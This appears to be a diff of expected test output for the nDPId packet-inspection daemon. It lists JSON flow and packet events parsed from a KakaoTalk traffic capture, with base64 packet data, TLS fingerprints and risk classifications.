-00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069164656,"flow_last_seen":1430069164656,"flow_idle_time":7440000,"flow_min_l4_payload_len":442,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":442,"midstream":1,"thread_ts_msec":1430069164656,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -01060{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1430069164656,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":498,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":498,"pkt_l4_len":462,"thread_ts_msec":1430069164656,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAeIKLkAAjgb4AIuWAH0KGFK8Abu3Y2Ij1H9RKASKUBifhj2IAAC2AQAA7+nGaLVdqRc+Gkt7POZ3izYarM8cfC\/oKc57w3ON8GY\/K1szNYS+6Yytrgv9fJ110+svPWy4JXfqhqsy8n\/Qi0EhBo8vKa7TtIo39CMQrfI1DyAke3OCHinKUbcE7JofE08wNW\/SYiLVq+ch1jInTJlBtTETD6sakW5t+\/pqslJuJu6FErHiOcJlRXUhJ\/w2UMRtIuPzDgq66Pu7iQ4cPuLk01HGBYGyY\/ec8L+8kz8C0iE6HOIH6YT0BKGthN3UTgwPbBq6O4DQcUiN2hgrUDIxq8uw9ZbWllzKNEYrEa8k7r3ZVHoPDQdXWrcQvhxam6oeYyK7V8McoNRiSIayjOQMTgXnysBnscEyik7me1vByK2C0l2He7bBFWQmrSmeZXMFh2H60fcsxZbAlEWK0siSqlB7jvAlTaG4udBSGXSTj4rEL2MZLSGqP2XF68ncz4+WzMi\/pNklQw9YyvrinQJFb3QOjkMePALF9ilvEQ+wMia1\/U8MBwJo9G9KKjVSCXjRCZRheUcgsdenusXElIUwOqnMT+7rwPfeomV3b9fbsOdbRa7VkQEi4icvvEwgda+Sg6Qy"} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1430069164657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069164657,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjTg0AAQAZ+ZQoYUryLlgB9t2MBu1EoBIpiI9Y5UBCiGOkBAAA="} -00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1430069164839,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":98,"pkt_l4_len":62,"thread_ts_msec":1430069164839,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAFLThEAAQAZ+OgoYUryLlgB9t2MBu1EoBIpiI9Y5UBiiGP3wAAAmAAAA7+nGaLVdqRc+Gkt7POZ3izYaHM4cfJ\/pKc5wznSY7XhZjDJkzsc="} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069164966,"flow_last_seen":1430069164966,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069164966,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1430069164966,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069164966,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADxKlUAAQAaV1AoYUrxuTI8y5ekjKS1pjaoAAAAAoAI2sFqBAAACBAV4BAIICgACxz8AAAAAAQMDBQ=="} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1430069165114,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069165114,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALgbyaW5MjzIKGFK8Iynl6dfwna4taY2roBI4kADPAAACBAV4BAIICkTbbpQAAsc\/AQMDCQ=="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1430069165115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069165115,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADRKlkAAQAaV2woYUrxuTI8y5ekjKS1pjavX8J2vgBABtlp5AAABAQgKAALHTkTbbpQ="} 
-01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069164966,"flow_last_seen":1430069165129,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069165129,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01519{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":58,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069164966,"flow_last_seen":1430069165314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1430069165314,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": 
{"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"4ea82b75038dd27e8a1cb69d8b839b26","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","subjectDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","fingerprint":"65:88:37:51:01:AA:1F:12:E4:44:27:52:F9:32:FD:40:94:C1:08:D9"}} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170090,"flow_last_seen":1430069170090,"flow_idle_time":7440000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069170090,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1430069170090,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":164,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":164,"pkt_l4_len":128,"thread_ts_msec":1430069170090,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAJSUaEAAQAZSqQoYUrytwki8h34UbGWkOWcyCtXvgBgB1zgmAAABAQgKAALJQHWhBxYXAwEAW9BJTUK7bhQDJS6M4k2xveYn3KZ2THpi3b2p1WnyM44nZ0651+YzJehbLb+jV4nNEd4GZbKLQU+P8abQYninXFhPSKcNuFppnDwsImxNyj3HrOvurwOWRZpYp3o="} 
+00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069140120,"flow_last_seen":1430069140120,"flow_idle_time":7560000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":1,"thread_ts_msec":1430069140120,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1430069140120,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":130,"pkt_l4_len":94,"thread_ts_msec":1430069140120,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAHLza0AAPwZJVQoYUrxn9jn7x00fkMsN+RcrPwfugBgApZHwAAABAQgKAAs11Jj3Xso6AAAArVkC\/4gP\/deLY5qAl+gvk5f8xql5QXAwvM9bb5tQyHwtP1GibAaltsw94jGcvj4NNAB8Nc8SXCTCPg=="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1430069140453,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069140453,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADRbKkAALgby1Gf2OfsKGFK8H5DHTSs\/B+7LDflVgBAADqYIAAABAQgKmPgkmwALNdQ="} 
+00651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1430069140501,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":194,"pkt_l4_len":158,"thread_ts_msec":1430069140501,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAALJbK0AALgbyVWf2OfsKGFK8H5DHTSs\/B+7LDflVgBgADj7dAAABAQgKmPgkrAALNdR6AAAArVkC\/4gP\/deLY5qAl+gvk5f8hql5QTAwvM9Zf4dQyEAJD7QL56t1BA6CZFNB9CDoZPBzNcfqISYY4Bqx6IvbToog47dFxVed4MxS159GEgFcWpzNI6MS\/uDRtBTN\/KgQO5PWR5hOlzi0NPjPSZ5ZvXYRnArc8Dv9Cys="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069141261,"flow_last_seen":1430069141261,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069141261,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34533,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1430069141261,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069141261,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcACgY+0AArAbF1ngcGvIKGFK8AFCG5WVqLr9xAeFBUBH\/\/1JPAAA="} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1430069141403,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069141403,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjM1kAAPwZ\/FwoYUrx4HBryhuUAUHEB4UFlai7AUBA5CBlHAAA="} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1430069141433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069141433,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcACgY\/EAArAbF1XgcGvIKGFK8AFCG5WVqLr9xAeFBUBH\/\/1JPAAA="} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069141923,"flow_last_seen":1430069141923,"flow_idle_time":7560000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1430069141923,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.185.236","src_port":58916,"dst_port":5222,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1430069141923,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":157,"pkt_l4_len":121,"thread_ts_msec":1430069141923,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAI3lSkAAPwYIYQoYUrw2\/7ns5iQUZtvqJ3tQl6xegBgAe+ktAAABAQgKAAs2irXIgpc8aXEgdG89J3hpYW9taS5jb20nIGlkPScwJyBjaGlkPScwJyB0eXBlPSdnZXQnPjxwaW5nIHhtbG5zPSd1cm46eG1wcDpwaW5nJz48L3Bpbmc+PC9pcT4NCg=="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1430069142333,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069142333,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADTWOEAALQYpzDb\/uewKGFK8FGbmJFCXrF7b6ifUgBAAZ2sMAAABAQgKtcrV6gALNoo="} +00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1430069142373,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":103,"pkt_l4_len":67,"thread_ts_msec":1430069142373,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAFfWOUAALQYpqDb\/uewKGFK8FGbmJFCXrF7b6ifUgBgAZ9bAAAABAQgKtcrV6gALNoo8aXEgY2hpZD0nMCcgaWQ9JzAnIHR5cGU9J3Jlc3VsdCcvPg=="} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069159456,"flow_last_seen":1430069159456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069159456,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1430069159456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069159456,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzUvUAAPwaqhQoYUrzLzZPXvWkAUI8S6Z4AAAAAoAI2sOF5AAACBAV4BAIICgALPSMAAAAAAQMDBw=="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1430069159814,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069159814,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzUvkAAPwaqhAoYUrzLzZPXvWkAUI8S6Z4AAAAAoAI2sOEVAAACBAV4BAIICgALPYcAAAAAAQMDBw=="} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1430069161833,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069161833,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzUv0AAPwaqgwoYUrzLzZPXvWkAUI8S6Z4AAAAAoAI2sOBNAAACBAV4BAIICgALPk8AAAAAAQMDBw=="} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069161865,"flow_last_seen":1430069161865,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069161865,"l3_proto":"ip4","src_ip":"216.58.220.161","dst_ip":"10.24.82.188","src_port":443,"dst_port":56697,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1430069161865,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069161865,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACioy0AAjgYyVNg63KEKGFK8Abvded6D6B\/TTMkUUBSjubgsAAA="} 
+00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1430069159456,"flow_last_seen":1430069161892,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":609,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1430069161892,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkminorshort.weixin.qq.com","url":"http:\/\/hkminorshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/rtkvreport","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} +01006{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069159456,"flow_last_seen":1430069163198,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":815,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1430069163198,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Download"},"http": {"hostname":"hkminorshort.weixin.qq.com","url":"http:\/\/hkminorshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/rtkvreport","code":200,"content_type":"application\/octet-stream","user_agent":"MicroMessenger Client"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069163715,"flow_last_seen":1430069163715,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069163715,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1430069163715,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069163715,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzn5UAAPwb5gwoYUrxuTI8ygMgfkPcR2OkAAAAAoAI5CAV2AAACBAV4BAIICgALPwwAAAAAAQMDBw=="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1430069163856,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069163856,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALgbyaW5MjzIKGFK8H5CAyJJ42pD3EdjqoBI4kOpNAAACBAV4BAIICkTbaagACz8MAQMDCQ=="} 
+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1430069163867,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069163867,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADTn5kAAPwb5igoYUrxuTI8ygMgfkPcR2OqSeNqRgBAAc1DtAAABAQgKAAs\/HETbaag="} +01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069163715,"flow_last_seen":1430069163878,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069163878,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01519{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069163715,"flow_last_seen":1430069164107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1430069164107,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"4ea82b75038dd27e8a1cb69d8b839b26","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","subjectDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","fingerprint":"65:88:37:51:01:AA:1F:12:E4:44:27:52:F9:32:FD:40:94:C1:08:D9"}} 
